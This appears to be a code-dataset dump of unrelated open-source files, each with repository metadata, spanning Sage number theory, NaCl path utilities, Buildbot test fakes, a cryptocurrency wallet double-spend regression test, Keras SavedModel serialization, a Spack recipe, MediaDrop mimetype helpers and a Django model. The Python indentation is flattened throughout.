except AttributeError:
return K.ideal(a).is_S_unit(S)
def unramified_outside_S(L,S, p=None, debug=False):
r"""Test whether ``L`` is unramified over its base outside ``S``.
INPUT:
- ``L`` (relative number field) -- a relative number field with base field `K`.
- ``S`` (list) -- a list pf primes of `K`.
- ``p`` (prime or ``None`` (default)) -- if not ``None``, a prime number.
- ``debug`` (boolean (default ``False``)) -- debugging flag.
OUTPUT:
(boolean) ``True`` if and only if 'L/K' is unramified outside `S`.
If `p` is not ``None`` only test primes dividing `p`.
"""
# This one-liner works but is slow
# return is_S_unit(L.relative_discriminant(),S)
if debug:
print("testing ramification of {}".format(L))
f = L.defining_polynomial()
d = f.discriminant()
K = f.base_ring()
if K==QQ:
D = d
else:
D = K.ideal(d)
for P in S:
for _ in range(D.valuation(P)):
D /= P
# now D is the prime-to-S part of disc(f)
if debug:
print("Prime-to-S part of disc = {} with norm {}".format(D,D.absolute_norm()))
try:
bads = D.prime_factors()
except AttributeError:
bads = D.support()
if p is not None:
p = K(p)
bads = [P for P in bads if p.valuation(P)>0]
if debug:
print("bads = {}".format(bads))
if not bads:
if debug:
print("OK: no bad primes in disc")
return True
if any(d.valuation(P)%2==1 for P in bads):
if debug:
print("NO: disc has odd valn at some bad primes in disc")
return False
# Now d is divisible by one or more primes not in S, to even
# powers, and we must work harder to see if L is ramified at these
# primes.
if debug:
print("final check of {} bad primes in disc: {}".format(len(bads), bads))
for P in bads:
if debug:
print("Testing whether {} is ramified in L".format(P))
for Q in L.primes_above(P):
e = Q.relative_ramification_index()
if e>1:
if debug:
print("NO")
return False
if debug:
print("OK")
return True
| gpl-3.0 | 7,234,085,552,036,957,000 | 31.404973 | 124 | 0.585727 | false |
guorendong/iridium-browser-ubuntu | native_client/pnacl/driver/pathtools.py | 8 | 3069 | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pathtools is meant to be a drop-in replacement for "os.path"
#
# All pathnames passed into the driver are "normalized" to
# a posix representation (with / as the separator). For example,
# on Windows, C:\foo\bar.c would become /cygdrive/c/foo/bar.c
# On all other platforms, pathnames are already in the correct form.
#
# This is convenient for two reasons:
# 1) All of the tools invoked by the driver expect this type
# of pathname. (since on Windows, they are compiled with cygwin)
# 2) Everywhere in the driver, we can assume / is the path separator.
#
# Special functions:
#
# pathtools.normalize: Convert an OS-style path into a normalized path
# pathtools.tosys : Convert a normalized path into an OS-style path
# pathtools.touser : Convert a normalized path into a representation
# suitable for presentation to the user.
import os
import platform
import posixpath
# This is only true when the driver is invoked on
# Windows, but outside of Cygwin.
WINDOWS_MANGLE = 'windows' in platform.system().lower()
def normalize(syspath):
""" Convert an input path into a normalized path. """
if WINDOWS_MANGLE:
# Recognize paths which are already normalized.
# (Should only happen during recursive driver calls)
if '\\' not in syspath:
return syspath
return syspath.replace('\\', '/')
else:
return syspath
# All functions below expect a normalized path as input
def touser(npath):
""" Convert a unix-style path into a user-displayable format """
return tosys(npath)
def tosys(npath):
""" Convert a normalized path into a system-style path """
if WINDOWS_MANGLE:
if npath.startswith('/cygdrive'):
components = npath.split('/')
assert(components[0] == '')
assert(len(components[2]) == 1)
drive = components[2]
components = components[3:]
return '%s:\\%s' % (drive.upper(), '\\'.join(components))
else:
# Work around for an issue that windows has opening long
# relative paths. http://bugs.python.org/issue4071
npath = os.path.abspath(unicode(npath))
return npath.replace('/', '\\')
else:
return npath
def join(*args):
return posixpath.join(*args)
def exists(npath):
return os.path.exists(tosys(npath))
def split(npath):
return posixpath.split(npath)
def splitext(npath):
return posixpath.splitext(npath)
def basename(npath):
return posixpath.basename(npath)
def dirname(npath):
return posixpath.dirname(npath)
def abspath(npath):
if WINDOWS_MANGLE:
# We always use absolute paths for (non-cygwin) windows
return npath
else:
return posixpath.abspath(npath)
def normpath(npath):
return posixpath.normpath(npath)
def isdir(npath):
return os.path.isdir(tosys(npath))
def isfile(npath):
return os.path.isfile(tosys(npath))
def getsize(npath):
return os.path.getsize(tosys(npath))
| bsd-3-clause | 8,624,855,698,261,831,000 | 28.228571 | 72 | 0.70088 | false |
shoelzer/buildbot | master/buildbot/test/fake/fakebuild.py | 6 | 3000 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
import posixpath
import mock
from twisted.python import components
from buildbot import config
from buildbot import interfaces
from buildbot.process import factory
from buildbot.process import properties
from buildbot.process import workerforbuilder
from buildbot.test.fake import fakemaster
from buildbot.worker import base
class FakeBuildStatus(properties.PropertiesMixin, object):
def __init__(self):
self.properties = properties.Properties()
def getInterestedUsers(self):
return []
def setWorkername(self, _):
pass
def setSourceStamps(self, _):
pass
def setReason(self, _):
pass
def setBlamelist(self, _):
pass
def buildStarted(self, _):
return True
setText = mock.Mock()
setText2 = mock.Mock()
setResults = mock.Mock()
def buildFinished(self):
pass
getBuilder = mock.Mock()
components.registerAdapter(
lambda build_status: build_status.properties,
FakeBuildStatus, interfaces.IProperties)
class FakeBuild(properties.PropertiesMixin):
def __init__(self, props=None, master=None):
self.build_status = FakeBuildStatus()
self.builder = fakemaster.FakeBuilderStatus(master)
self.workerforbuilder = mock.Mock(
spec=workerforbuilder.WorkerForBuilder)
self.workerforbuilder.worker = mock.Mock(spec=base.Worker)
self.builder.config = config.BuilderConfig(
name='bldr',
workernames=['a'],
factory=factory.BuildFactory())
self.path_module = posixpath
self.buildid = 92
self.number = 13
self.workdir = 'build'
self.locks = []
self.sources = {}
if props is None:
props = properties.Properties()
props.build = self
self.build_status.properties = props
def getSourceStamp(self, codebase):
if codebase in self.sources:
return self.sources[codebase]
return None
def allFiles(self):
return []
def getBuilder(self):
return self.builder
components.registerAdapter(
lambda build: build.build_status.properties,
FakeBuild, interfaces.IProperties)
| gpl-2.0 | 8,668,132,655,584,157,000 | 26.272727 | 79 | 0.687333 | false |
goldcoin/Goldcoin-GLD | qa/rpc-tests/txn_doublespend.py | 2 | 6932 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with a double-spend conflict
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 250000
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 249969)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 249969 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# First: use raw transaction API to send 1240 BTC to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 249969)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 240000
outputs[change_address] = 249998 - 240000 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransaction(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 BTC coin each
txid1 = self.nodes[0].sendfrom("foo", node1_address, 8000, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus 40, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 10000
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 249969+tx1["amount"]+tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
ds_tx = self.nodes[2].decoderawtransaction(doublespend["hex"])
print("------")
input0 = self.nodes[0].gettransaction(str(rawtx_input_0["txid"]))
input1 = self.nodes[0].gettransaction(rawtx_input_1["txid"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
# two more matured blocks, minus 1240 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 20000 - 240000 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
# Final "" balance is starting_balance - amount moved to accounts - doublespend + subsidies +
# fees (which are negative)
assert_equal(self.nodes[0].getbalance("foo"), 249969)
assert_equal(self.nodes[0].getbalance("bar"), 29)
assert_equal(self.nodes[0].getbalance(""), starting_balance
-249969
- 29
-240000
+ 20000
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
# Node1's "from0" account balance should be just the doublespend:
assert_equal(self.nodes[1].getbalance("from0"), 240000)
if __name__ == '__main__':
TxnMallTest().main()
| mit | -1,700,670,968,282,653,400 | 44.605263 | 112 | 0.586555 | false |
Lemma1/MAC-POSTS | doc_builder/sphinx-contrib/traclinks/sphinxcontrib/traclinks.py | 2 | 1062 | '''
Sphinx/docutils extension to create links to a Trac site using
a RestructuredText interpreted text role that looks like this:
:trac:`trac_link_text`
for example:
:trac:`#2015`
creates a link to ticket number 2015.
adapted from recipe here:
http://stackoverflow.com/questions/2096401/sphinx-generate-automatic-references-to-trac-tickets-and-changesets
'''
import urllib
from docutils import nodes, utils
def make_trac_link(name, rawtext, text, lineno, inliner,
options={}, content=[]):
env = inliner.document.settings.env
trac_url = env.config.traclinks_base_url
ref = trac_url + '/intertrac/' + urllib.quote(text, safe='')
node = nodes.reference(rawtext, utils.unescape(text), refuri=ref, **options)
return [node],[]
# setup function to register the extension
def setup(app):
app.add_config_value('traclinks_base_url',
'http://trac.edgewall.com/trac',
'env')
app.add_role('trac', make_trac_link) | mit | 2,804,587,890,816,942,000 | 26.756757 | 110 | 0.640301 | false |
petewarden/tensorflow | tensorflow/python/keras/saving/saved_model/serialized_attributes.py | 1 | 13351 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helper classes that list&validate all attributes to serialize to SavedModel.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import def_function
from tensorflow.python.keras.saving.saved_model import constants
from tensorflow.python.keras.saving.saved_model import save_impl
from tensorflow.python.keras.utils.generic_utils import LazyLoader
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.training.tracking.tracking import AutoTrackable
# TODO(b/134426265): Switch back to single-quotes to match the rest of the file
# once the issue with copybara is fixed.
# pylint:disable=g-inconsistent-quotes
base_layer = LazyLoader(
"base_layer", globals(),
"tensorflow.python.keras.engine.base_layer")
training_lib = LazyLoader(
"training_lib", globals(),
"tensorflow.python.keras.engine.training")
metrics = LazyLoader("metrics", globals(),
"tensorflow.python.keras.metrics")
recurrent = LazyLoader(
"recurrent", globals(),
"tensorflow.python.keras.layers.recurrent")
# pylint:enable=g-inconsistent-quotes
class SerializedAttributes(object):
"""Class that tracks and validates all serialization attributes.
Keras models contain many Python-defined components. For example, the
trainable_variable property lists the model's trainable variables by
recursively retrieving the trainable variables from each of the child layers.
Another example is model.call, a python function that calls child layers and
adds ops to the backend graph.
Only Tensorflow checkpointable objects and functions can be serialized to
SavedModel. Serializing a Keras model as-is results in a checkpointable object
that does not resemble a Keras model at all. Thus, extra checkpointable
objects and functions must be created during serialization.
**Defining new serialized attributes**
Child classes should be defined using:
SerializedAttributes.with_attributes(
'name', checkpointable_objects=[...], functions=[...], copy_from=[...])
This class is used to cache generated checkpointable objects and functions,
ensuring that new objects and functions are generated a single time.
**Usage during serialization**
Each Layer/Model object should have a corresponding instance of
SerializedAttributes. Create a new instance by calling
`SerializedAttributes.new(obj)`. Objects and functions may be saved using
`.set_and_validate_checkpointable_objects`/`.set_and_and_validate_functions`.
The properties `.checkpointable_objects` and `.functions` returns the cached
values.
**Adding/changing attributes to save to SavedModel**
1. Change the call to `SerializedAttributes.with_attributes` in the correct
class:
- CommonEndpoints: Base attributes to be added during serialization. If
these attributes are present in a Trackable object, it can be
deserialized to a Keras Model.
- LayerAttributes: Attributes to serialize for Layer objects.
- ModelAttributes: Attributes to serialize for Model objects.
2. Update class docstring
3. Update arguments to any calls to `set_and_validate_*`. For example, if
`call_raw_tensors` is added to the ModelAttributes function list, then
a `call_raw_tensors` function should be passed to
`set_and_validate_functions`.
**Common endpoints vs other attributes**
Only common endpoints are attached directly to the root object. Keras-specific
attributes are saved to a separate trackable object with the name "keras_api".
The number of objects attached to the root is limited because any naming
conflicts will cause user code to break.
Another reason is that this will only affect users who call
`tf.saved_model.load` instead of `tf.keras.models.load_model`. These are
advanced users who are likely to have defined their own tf.functions and
trackable objects. The added Keras-specific attributes are kept out of the way
in the "keras_api" namespace.
Properties defined in this class may be used to filter out keras-specific
attributes:
- `functions_to_serialize`: Returns dict of functions to attach to the root
object.
- `checkpointable_objects_to_serialize`: Returns dict of objects to attach to
the root object (including separate trackable object containing
keras-specific attributes)
All changes to the serialized attributes must be backwards-compatible, so
attributes should not be removed or modified without sufficient justification.
"""
@staticmethod
def with_attributes(
name, checkpointable_objects=None, functions=None, copy_from=None):
"""Creates a subclass with all attributes as specified in the arguments.
Args:
name: Name of subclass
checkpointable_objects: List of checkpointable objects to be serialized
in the SavedModel.
functions: List of functions to be serialized in the SavedModel.
copy_from: List of other SerializedAttributes subclasses. The returned
class will copy checkpoint objects/functions from each subclass.
Returns:
Child class with attributes as defined in the `checkpointable_objects`
and `functions` lists.
"""
checkpointable_objects = checkpointable_objects or []
functions = functions or []
if copy_from is not None:
for cls in copy_from:
checkpointable_objects.extend(cls.all_checkpointable_objects)
functions.extend(cls.all_functions)
classdict = {
'all_checkpointable_objects': set(checkpointable_objects),
'all_functions': set(functions)}
return type(name, (SerializedAttributes,), classdict)
@staticmethod
def new(obj):
"""Returns a new SerializedAttribute object."""
if isinstance(obj, training_lib.Model):
return ModelAttributes()
elif isinstance(obj, metrics.Metric):
return MetricAttributes()
elif isinstance(obj, recurrent.RNN):
return RNNAttributes()
elif isinstance(obj, base_layer.Layer):
return LayerAttributes()
else:
raise TypeError('Internal error during serialization: Expected Keras '
'Layer object, got {} of type {}'.format(obj, type(obj)))
def __init__(self):
self._object_dict = {}
self._function_dict = {}
self._keras_trackable = AutoTrackable()
@property
def functions(self):
"""Returns dictionary of all functions."""
return {key: value for key, value in self._function_dict.items()
if value is not None}
@property
def checkpointable_objects(self):
"""Returns dictionary of all checkpointable objects."""
return {key: value for key, value in self._object_dict.items()
if value is not None}
@property
def functions_to_serialize(self):
"""Returns functions to attach to the root object during serialization."""
functions = {}
for key, v in self.functions.items():
if key in CommonEndpoints.all_functions:
functions[key] = (v.wrapped_call if isinstance(v, save_impl.LayerCall)
else v)
return functions
@property
def objects_to_serialize(self):
"""Returns objects to attach to the root object during serialization."""
objects = {key: value for key, value in self.checkpointable_objects.items()
if key in CommonEndpoints.all_checkpointable_objects}
objects[constants.KERAS_ATTR] = self._keras_trackable
return objects
def set_and_validate_functions(self, function_dict):
"""Saves function dictionary, and validates dictionary values."""
for key in self.all_functions:
if key in function_dict:
if (function_dict[key] is not None and # Not all functions are required
not isinstance(function_dict[key],
(def_function.Function, save_impl.LayerCall))):
raise ValueError(
'Function dictionary contained a non-function object: {} (for key'
' {})'.format(function_dict[key], key))
fn = function_dict[key]
self._function_dict[key] = fn
# Extract TensorFlow `Function` from LayerCall.
tf_fn = fn.wrapped_call if isinstance(fn, save_impl.LayerCall) else fn
setattr(self._keras_trackable, key, tf_fn)
else:
raise ValueError('Function {} missing from serialized function dict.'
.format(key))
return self.functions
def set_and_validate_objects(self, object_dict):
"""Saves objects to a dictionary, and validates the values."""
for key in self.all_checkpointable_objects:
if key in object_dict:
if not isinstance(object_dict[key], trackable.Trackable):
raise ValueError(
'Object dictionary contained a non-trackable object: {} (for key'
' {})'.format(object_dict[key], key))
self._object_dict[key] = object_dict[key]
setattr(self._keras_trackable, key, object_dict[key])
else:
raise ValueError(
'Object {} missing from serialized object dict.'.format(key))
return self.checkpointable_objects
class CommonEndpoints(SerializedAttributes.with_attributes(
'CommonEndpoints',
checkpointable_objects=['variables', 'trainable_variables',
'regularization_losses'],
functions=['__call__', 'call_and_return_all_conditional_losses',
'_default_save_signature'])):
"""Common endpoints shared by all models loadable by Keras.
List of all attributes:
variables: List of all variables in the model and its sublayers.
trainable_variables: List of all trainable variables in the model and its
sublayers.
regularization_losses: List of all unconditional losses (losses not
dependent on the inputs) in the model and its sublayers.
__call__: Function that takes inputs and returns the outputs of the model
call function.
call_and_return_all_conditional_losses: Function that returns a tuple of
(call function outputs, list of all losses that depend on the inputs).
_default_save_signature: Traced model call function. This is only included
if the top level exported object is a Keras model.
"""
class LayerAttributes(SerializedAttributes.with_attributes(
'LayerAttributes',
checkpointable_objects=['non_trainable_variables', 'layers', 'metrics',
'layer_regularization_losses', 'layer_metrics'],
functions=['call_and_return_conditional_losses', 'activity_regularizer_fn'],
copy_from=[CommonEndpoints]
)):
"""Layer checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from CommonEndpoints
non_trainable_variables: List of non-trainable variables in the layer and
its sublayers.
layers: List of all sublayers.
metrics: List of all metrics in the layer and its sublayers.
call_and_return_conditional_losses: Function that takes inputs and returns a
tuple of (outputs of the call function, list of input-dependent losses).
The list of losses excludes the activity regularizer function, which is
separate to allow the deserialized Layer object to define a different
activity regularizer.
activity_regularizer_fn: Callable that returns the activity regularizer loss
layer_regularization_losses: List of losses owned only by this layer.
layer_metrics: List of metrics owned by this layer.
"""
class ModelAttributes(SerializedAttributes.with_attributes(
'ModelAttributes',
copy_from=[LayerAttributes])):
"""Model checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from LayerAttributes (including CommonEndpoints)
"""
# TODO(kathywu): Add attributes `compile_losses` and `compile_metrics`, which
# list all losses and metrics defined by `model.compile`.
class MetricAttributes(
SerializedAttributes.with_attributes(
'MetricAttributes',
checkpointable_objects=['variables'],
functions=[],
)):
"""Attributes that are added to Metric objects when saved to SavedModel.
List of all attributes:
variables: list of all variables
"""
pass
class RNNAttributes(SerializedAttributes.with_attributes(
'RNNAttributes',
checkpointable_objects=['states'],
copy_from=[LayerAttributes])):
"""RNN checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from LayerAttributes (including CommonEndpoints)
states: List of state variables
"""
| apache-2.0 | 5,526,067,801,508,030,000 | 41.519108 | 80 | 0.713729 | false |
iulian787/spack | var/spack/repos/builtin/packages/kassiopeia/package.py | 2 | 2937 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Kassiopeia(CMakePackage):
"""Simulation of electric and magnetic fields and particle tracking."""
homepage = "https://katrin-experiment.github.io/Kassiopeia/"
url = "https://github.com/KATRIN-Experiment/Kassiopeia/archive/v3.6.1.tar.gz"
git = "https://github.com/KATRIN-Experiment/Kassiopeia.git"
tags = ['hep']
maintainers = ['wdconinc']
version('3.7.5', sha256='8f28d08c7ef51e64221e0a4705f3cee3a5d738b8cdde5ce9fa58a3a0dd14ae05')
version('3.7.4', sha256='c1514163a084530930be10dbe487fb1950ccbc9662a4a190bdecffbd84a71fd4')
version('3.7.3', sha256='a8753585b9fa0903e1f5f821c4ced3cddd72792ad7e6075a7e25318f81ad9eaa')
version('3.7.2', sha256='bdfdf8c26fa5ad19e8b9c6eb600dfbd3c8218cd695ce067f10633b63bd192f92')
version('3.7.1', sha256='b22ae2fe5c2271bdf6aaf65d9ecf57ff0d6a88d28ad26d176e1129f0e58faea4')
version('3.7.0', sha256='32a3e98c77d1b97fe9862cf1d8c6ba8e6c82fb9295a6a217c7ce77cbec751046')
version('3.6.1', sha256='30193d5384ad81b8570fdcd1bb35b15cc365ab84712819ac0d989c6f5cf6f790')
version('3.5.0', sha256='b704d77bd182b2806dc8323f642d3197ce21dba3d456430f594b19a7596bda22')
version('3.4.0', sha256='4e2bca61011e670186d49048aea080a06c3c95dacf4b79e7549c36960b4557f4')
variant("root", default=False,
description="Include support for writing ROOT files")
variant("vtk", default=False,
description="Include visualization support through VTK")
variant("mpi", default=False,
description="Include MPI support for field calculations")
variant("tbb", default=False,
description="Include Intel TBB support for field calculations")
variant("opencl", default=False,
description="Include OpenCL support for field calculations")
depends_on('[email protected]:', type='build')
depends_on('zlib')
depends_on('[email protected]:', when='+root')
depends_on('[email protected]:', when='+vtk')
depends_on('mpi', when='+mpi')
depends_on('tbb', when='+tbb')
depends_on('opencl', when='+opencl')
def cmake_args(self):
args = []
if self.spec.satisfies('+vtk'):
args.append('-DKASPER_USE_VTK=ON')
else:
args.append('-DKASPER_USE_VTK=OFF')
if self.spec.satisfies('+tbb'):
args.append('-DKASPER_USE_TBB=ON')
else:
args.append('-DKASPER_USE_TBB=OFF')
if self.spec.satisfies('+mpi'):
args.append('-DKEMField_USE_MPI=ON')
else:
args.append('-DKEMField_USE_MPI=OFF')
if self.spec.satisfies('+opencl'):
args.append('-DKEMField_USE_OPENCL=ON')
else:
args.append('-DKEMField_USE_OPENCL=OFF')
return args
| lgpl-2.1 | 4,810,716,133,183,114,000 | 42.835821 | 95 | 0.684372 | false |
midroid/mediadrop | mediadrop/lib/filetypes.py | 10 | 5359 | # This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2015 MediaDrop contributors
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
from mediadrop.lib.i18n import _
from mediadrop.plugin.events import (media_types as registered_media_types,
observes)
__all__ = [
'guess_container_format',
'guess_media_type',
'guess_mimetype',
'registered_media_types',
]
AUDIO = u'audio'
VIDEO = u'video'
AUDIO_DESC = u'audio_desc'
CAPTIONS = u'captions'
@observes(registered_media_types)
def register_default_types():
default_types = [
(VIDEO, _('Video')),
(AUDIO, _('Audio')),
(AUDIO_DESC, _('Audio Description')),
(CAPTIONS, _('Captions')),
]
for t in default_types:
yield t
# Mimetypes for all file extensions accepted by the front and backend uploaders
#
# OTHER USES:
# 1) To determine the mimetype to serve, based on a MediaFile's container type.
# 2) In conjunction with the container_lookup dict below to determine the
# container type for a MediaFile, based on the uploaded file's extension.
#
# XXX: The keys in this dict are sometimes treated as names for container types
# and sometimes treated as file extensions. Caveat coder.
# TODO: Replace with a more complete list or (even better) change the logic
# to detect mimetypes from something other than the file extension.
mimetype_lookup = {
u'flac': u'audio/flac',
u'mp3': u'audio/mpeg',
u'mp4': u'%s/mp4',
u'm4a': u'audio/mp4',
u'm4v': u'video/mp4',
u'ogg': u'%s/ogg',
u'oga': u'audio/ogg',
u'ogv': u'video/ogg',
u'mka': u'audio/x-matroska',
u'mkv': u'video/x-matroska',
u'3gp': u'%s/3gpp',
u'avi': u'video/avi',
u'dv': u'video/x-dv',
u'flv': u'video/x-flv', # made up, it's what everyone uses anyway.
u'mov': u'video/quicktime',
u'mpeg': u'%s/mpeg',
u'mpg': u'%s/mpeg',
u'webm': u'%s/webm',
u'wmv': u'video/x-ms-wmv',
u'm3u8': u'application/x-mpegURL',
u'xml': u'application/ttml+xml',
u'srt': u'text/plain',
}
# Default container format (and also file extension) for each mimetype we allow
# users to upload.
container_lookup = {
u'audio/flac': u'flac',
u'audio/mp4': u'mp4',
u'audio/mpeg': u'mp3',
u'audio/ogg': u'ogg',
u'audio/x-matroska': u'mka',
u'audio/webm': u'webm',
u'video/3gpp': u'3gp',
u'video/avi': u'avi',
u'video/mp4': u'mp4',
u'video/mpeg': u'mpg',
u'video/ogg': u'ogg',
u'video/quicktime': u'mov',
u'video/x-dv': u'dv',
u'video/x-flv': u'flv',
u'video/x-matroska': u'mkv',
u'video/x-ms-wmv': u'wmv',
u'video/x-vob': u'vob',
u'video/webm': u'webm',
u'application/x-mpegURL': 'm3u8',
u'application/ttml+xml': u'xml',
u'text/plain': u'srt',
}
# When media_obj.container doesn't match a key in the mimetype_lookup dict...
default_media_mimetype = 'application/octet-stream'
# File extension map to audio, video or captions
guess_media_type_map = {
'mp3': AUDIO,
'm4a': AUDIO,
'flac': AUDIO,
'mp4': VIDEO,
'm4v': VIDEO,
'ogg': VIDEO,
'oga': AUDIO,
'ogv': VIDEO,
'mka': AUDIO,
'mkv': VIDEO,
'3gp': VIDEO,
'avi': VIDEO,
'dv': VIDEO,
'flv': VIDEO,
'mov': VIDEO,
'mpeg': VIDEO,
'mpg': VIDEO,
'webm': VIDEO,
'wmv': VIDEO,
'xml': CAPTIONS,
'srt': CAPTIONS,
}
def guess_container_format(extension):
"""Return the most likely container format based on the file extension.
This standardizes to an audio/video-agnostic form of the container, if
applicable. For example m4v becomes mp4.
:param extension: the file extension, without a preceding period.
:type extension: string
:rtype: string
"""
mt = guess_mimetype(extension, default=True)
if mt is True:
return extension
return container_lookup.get(mt)
def guess_media_type(extension=None, default=VIDEO):
"""Return the most likely media type based on the container or embed site.
:param extension: The file extension without a preceding period.
:param default: Default to video if we don't have any other guess.
:returns: AUDIO, VIDEO, CAPTIONS, or None
"""
return guess_media_type_map.get(extension, default)
def guess_mimetype(container, type_=None, default=None):
"""Return the best guess mimetype for the given container.
If the type (audio or video) is not provided, we make our best guess
as to which is will probably be, using :func:`guess_container_type`.
Note that this value is ignored for certain mimetypes: it's useful
only when a container can be both audio and video.
:param container: The file extension
:param type_: AUDIO, VIDEO, or CAPTIONS
:param default: Default mimetype for when guessing fails
:returns: A mime string or None.
"""
if type_ is None:
type_ = guess_media_type(container)
mt = mimetype_lookup.get(container, None)
if mt is None:
return default or default_media_mimetype
try:
return mt % type_
except (ValueError, TypeError):
return mt
| gpl-3.0 | 6,381,285,242,181,021,000 | 29.976879 | 79 | 0.641724 | false |
brayden2544/Mystuff-final | manage/models.py | 2 | 6310 | from django.db import models
from account.models import User
from django.conf import settings
from django.utils import timezone
from account import models as amod
class Store(models.Model):
active = models.BooleanField(default=True)
store_number = models.IntegerField(default=0, blank=True, null=True)
location_name = models.CharField(max_length=200, blank=True, null=True)
street = models.CharField(max_length=200, blank=True, null=True)
city = models.CharField(max_length=200, blank=True, null=True)
state = models.CharField(max_length=200, blank=True, null=True)
zip_code = models.CharField(max_length=5, blank=True, null=True)
phone = models.CharField(max_length=200, blank=True, null=True)
hours = models.CharField(max_length=200, blank=True, null=True)
#manager = models.ForeignKey(User) will use later when I add the user class
def __str__(self):
return '%i: %s' % (self.id, self.location_name)
